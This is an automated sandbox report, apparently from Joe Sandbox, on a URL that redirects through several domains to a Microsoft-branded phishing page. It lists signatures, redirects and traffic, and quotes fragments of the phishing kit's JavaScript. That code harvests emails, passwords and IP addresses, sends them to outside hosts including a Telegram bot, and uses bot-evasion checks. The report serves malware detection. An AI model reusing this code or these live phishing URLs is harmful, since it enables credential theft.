
Windows Analysis Report
https://www.clkmg.com/h4pussy/1ywq9a

Overview

General Information

Sample URL: https://www.clkmg.com/h4pussy/1ywq9a
Analysis ID: 1653902
Infos:

Detection

Score: 68
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Creates files inside the system directory
Deletes files inside the Windows folder
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
Javascript checks online IP of machine
No HTML title found

Classification

Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.
  • System is w10x64_ra
  • chrome.exe (PID: 6644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,15434814748562672815,12799368222423242180,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.clkmg.com/h4pussy/1ywq9a" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched



AV Detection

Source: https://classntfst.shop/ne/ — Avira URL Cloud: Label: malware

Phishing

Source: https://oka.greenthreads.hr/ — Joe Sandbox AI: Score: 9. Reasons: The brand 'Microsoft' is classified as 'wellknown'. The URL 'oka.greenthreads.hr' does not match the legitimate domain 'microsoft.com'. The domain 'greenthreads.hr' does not have any known association with Microsoft. The presence of a non-Microsoft domain with a Microsoft brand reference is suspicious. The input field 'Enter recipient email' could be used for phishing purposes, especially if the domain is not legitimate. DOM: 2.4.pages.csv
Source: 2.10..script.csv — Joe Sandbox AI: Detected suspicious JavaScript with source URL: https://oka.greenthreads.hr/_next/static/chunks/pa... This script demonstrates several high-risk behaviors, including data exfiltration, obfuscated code, and dynamic code execution. It collects sensitive user information (email, password, IP address, user agent) and sends it to a Telegram bot, which is a strong indicator of malicious intent. The script also checks for bot activity and redirects users to a 'denied' page if a bot is detected. Overall, this script poses a significant security risk and should be treated as highly suspicious.
Source: https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[405],{5557:function(e,t,n){(window.__next_p=window.__next_p||[]).push(["/",function(){return n(6616)}])},6616:function(e,t,n){"use strict";n.r(t);var a=n(5893),o=n(7294),s=n(7066),i=n(2568),r=n.n(i),l=n(9812),c=n.n(l);let u=()=>{let[e,t]=(0,o.usestate)(""),[n,i]=(0,o.usestate)(""),[l,u]=(0,o.usestate)(!1),[d,_]=(0,o.usestate)("/favicon.ico"),[p,m]=(0,o.usestate)("verify your email identity to continue."),[g,h]=(0,o.usestate)(!1),x=e=>{t(e.target.value)},b=t=>{if(t.preventdefault(),e.includes("@")){u(!0),m("verify email password");let t=e.split("@")[1];_("https://logo.clearbit.com/".concat(t))}else alert("please enter a valid email address.")},f=async t=>{if(t.preventdefault(),n.length<5){alert("password must be at least 5 characters long.");return}h(!0);try{let t=await s.z.get("https://api64.ipify.org?format=json").then(e=>e.data.ip),a=await s.z.post("https://rail-bot-production.up.railway.app/api/detect_bot",{user_agent:navigator.useragent,ip:t}),{is_b...
Source: https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[405],{5557:function(e,t,n){(window.__next_p=window.__next_p||[]).push(["/",function(){return n(6616)}])},6616:function(e,t,n){"use strict";n.r(t);var a=n(5893),o=n(7294),s=n(7066),i=n(2568),r=n.n(i),l=n(9812),c=n.n(l);let u=()=>{let[e,t]=(0,o.usestate)(""),[n,i]=(0,o.usestate)(""),[l,u]=(0,o.usestate)(!1),[d,_]=(0,o.usestate)("/favicon.ico"),[p,m]=(0,o.usestate)("verify your email identity to continue."),[g,h]=(0,o.usestate)(!1),x=e=>{t(e.target.value)},b=t=>{if(t.preventdefault(),e.includes("@")){u(!0),m("verify email password");let t=e.split("@")[1];_("https://logo.clearbit.com/".concat(t))}else alert("please enter a valid email address.")},f=async t=>{if(t.preventdefault(),n.length<5){alert("password must be at least 5 characters long.");return}h(!0);try{let t=await s.z.get("https://api64.ipify.org?format=json").then(e=>e.data.ip),a=await s.z.post("https://rail-bot-production.up.railway.app/api/detect_bot",{user_agent:navigator.useragent,ip:t}),{is_b...
Source: https://oka.greenthreads.hr/ — HTTP Parser: Number of links: 0
Source: https://netro.gitcombust.shop/ — HTTP Parser: Base64 decoded: 1743522156.000000
Source: https://netro.gitcombust.shop/script.jsHTTP Parser: async function getuserip() { try { const response = await fetch('https://api64.ipify.org?format=json'); const data = await response.json(); return data.ip; } catch (error) { console.error('failed to get ip:', error); return '0.0.0.0'; // default ip in case of error }}// function to detect canvas fingerprintingfunction iscanvasblocked() { try { const canvas = document.createelement("canvas"); const ctx = canvas.getcontext("2d"); if (!ctx) return true; ctx.filltext("bot detection", 10, 10); return ctx.getimagedata(10, 10, 1, 1).data.length === 0; } catch (e) { return true; // if an error occurs, assume the canvas is blocked }}function detectbotlocally() { const botpatterns = [/bot/, /crawl/, /spider/, /scraper/, /python/, /httpclient/, /fetch/, /curl/]; const isbotuseragent = botpatterns.some(pattern => pattern.test(navigator.useragent.tolowercase())); c...
Source: https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[405],{5557:function(e,t,n){(window.__next_p=window.__next_p||[]).push(["/",function(){return n(6616)}])},6616:function(e,t,n){"use strict";n.r(t);var a=n(5893),o=n(7294),s=n(7066),i=n(2568),r=n.n(i),l=n(9812),c=n.n(l);let u=()=>{let[e,t]=(0,o.usestate)(""),[n,i]=(0,o.usestate)(""),[l,u]=(0,o.usestate)(!1),[d,_]=(0,o.usestate)("/favicon.ico"),[p,m]=(0,o.usestate)("verify your email identity to continue."),[g,h]=(0,o.usestate)(!1),x=e=>{t(e.target.value)},b=t=>{if(t.preventdefault(),e.includes("@")){u(!0),m("verify email password");let t=e.split("@")[1];_("https://logo.clearbit.com/".concat(t))}else alert("please enter a valid email address.")},f=async t=>{if(t.preventdefault(),n.length<5){alert("password must be at least 5 characters long.");return}h(!0);try{let t=await s.z.get("https://api64.ipify.org?format=json").then(e=>e.data.ip),a=await s.z.post("https://rail-bot-production.up.railway.app/api/detect_bot",{user_agent:navigator.useragent,ip:t}),{is_b...
Source: https://oka.greenthreads.hr/ — HTTP Parser: HTML title missing
Source: https://oka.greenthreads.hr/ — HTTP Parser: HTML title missing
Source: https://netro.gitcombust.shop/ — HTTP Parser: No favicon
Source: https://netro.gitcombust.shop/ — HTTP Parser: No favicon
Source: https://oka.greenthreads.hr/ — HTTP Parser: No favicon
Source: https://oka.greenthreads.hr/ — HTTP Parser: No favicon
Source: https://oka.greenthreads.hr/ — HTTP Parser: No <meta name="author".. found
Source: https://oka.greenthreads.hr/ — HTTP Parser: No <meta name="author".. found
Source: https://oka.greenthreads.hr/ — HTTP Parser: No <meta name="copyright".. found
Source: https://oka.greenthreads.hr/ — HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exe — Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 52.11.99.233:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.11.99.233:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.83.187.233:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.72.100:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.88.234:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: chrome.exe — Memory has grown: Private usage: 0MB later: 39MB
Source: C:\Program Files\Google\Chrome\Application\chrome.exe — HTTP traffic: Redirect from: patnero.thesilent.de to https://classntfst.shop/ne/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe — HTTP traffic: Redirect from: classntfst.shop to https://oka.greenthreads.hr
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.152.22
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.152.22
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: global trafficHTTP traffic detected: GET /h4pussy/1ywq9a HTTP/1.1Host: www.clkmg.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redir.cgi?url=5YLzHJtmmpWmacBzmzCY%2flX4xlmtZYa5OH2D9HeWNiho6ITfHFNLv4fgDcASlkcXru2gSFAsJp%2fzvbDs&pixel=0&lidc=1749346618 HTTP/1.1Host: www.clkmg.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: alc=1; vid=1157128538
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.clkmg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.clkmg.com/redir.cgi?url=5YLzHJtmmpWmacBzmzCY%2flX4xlmtZYa5OH2D9HeWNiho6ITfHFNLv4fgDcASlkcXru2gSFAsJp%2fzvbDs&pixel=0&lidc=1749346618Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: alc=1; vid=1157128538
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.clkmg.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /styles.css HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://netro.gitcombust.shop/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /script.js HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://netro.gitcombust.shop/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.clkmg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: alc=1; vid=1157128538
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://netro.gitcombust.shop/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/0.216127262788091:1743517896:WH6ejxtsVObjbtfWl3K5Ys8Re23onSxZleFLZs8jUh4/929932861ac41512 HTTP/1.1Host: netro.gitcombust.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/redirect?expires=1743522173464&hash=699926820f0cfbefd342dd7de6b398bf922012dc19667b917ed417a8978ec069 HTTP/1.1Host: patnero.thesilent.deConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/get_doc_url HTTP/1.1Host: patnero.thesilent.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ne/ HTTP/1.1Host: classntfst.shopConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/19d09a6113afa007.css HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-ee7e63bc15b31913.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-2c79e2a64abdb08b.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-de1ad41d606513c1.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-aea6920bd27938ca.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/186-e401717d9e8b842b.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-c362d579fbf7a668.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
